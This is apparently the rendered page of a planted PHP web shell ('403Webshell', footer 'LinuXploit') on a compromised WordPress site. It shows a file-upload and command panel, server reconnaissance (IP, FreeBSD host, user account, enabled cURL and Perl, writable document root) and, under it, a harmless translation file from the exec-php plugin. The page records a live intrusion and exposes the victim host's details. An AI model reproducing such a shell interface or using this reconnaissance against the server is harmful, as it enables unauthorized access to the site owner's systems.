403Webshell
Server IP : 49.212.180.16  /  Your IP : 3.12.160.196
Web Server : Apache
System : FreeBSD www2606.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User : utannto ( 1076)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/utannto/www/hironaka.biz/wp-content/plugins/exec-php/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/utannto/www/hironaka.biz/wp-content/plugins/exec-php/includes/l10n.php
<?php

if (!class_exists('ExecPhp_L10n')) :

if (!function_exists('translate')) :
// downward compatibility for older WP installations
function translate($text, $domain)
{
	global $l10n;

	if (isset($l10n[$domain])) {
		return $l10n[$domain]->translate($text);
	} else {
		return $text;
	}
}
endif;

if (!function_exists('translate_sprintf')) :
function translate_sprintf($text, $domain = 'default')
{
	if (func_num_args() <= 2)
		return translate($text, $domain);
	$args = func_get_args();
	array_shift($args);
	array_shift($args);
	array_unshift($args, translate($text, $domain));
	return call_user_func_array('sprintf', $args);
}
endif;

if (!function_exists('__s')) :
function __s($text, $domain = 'default')
{
	$args = func_get_args();
	return call_user_func_array('translate_sprintf', $args);
}
endif;

if (!function_exists('_es')) :
function _es($text, $domain = 'default')
{
	$args = func_get_args();
	echo call_user_func_array('translate_sprintf', $args);
}
endif;

if (!function_exists('escape_dquote')) :
function escape_dquote($text)
{
	return str_replace('"', '\"', $text);
}
endif;

class ExecPhp_L10n
{
}
endif;

?>

Youez - 2016 - github.com/yon3zu
LinuXploit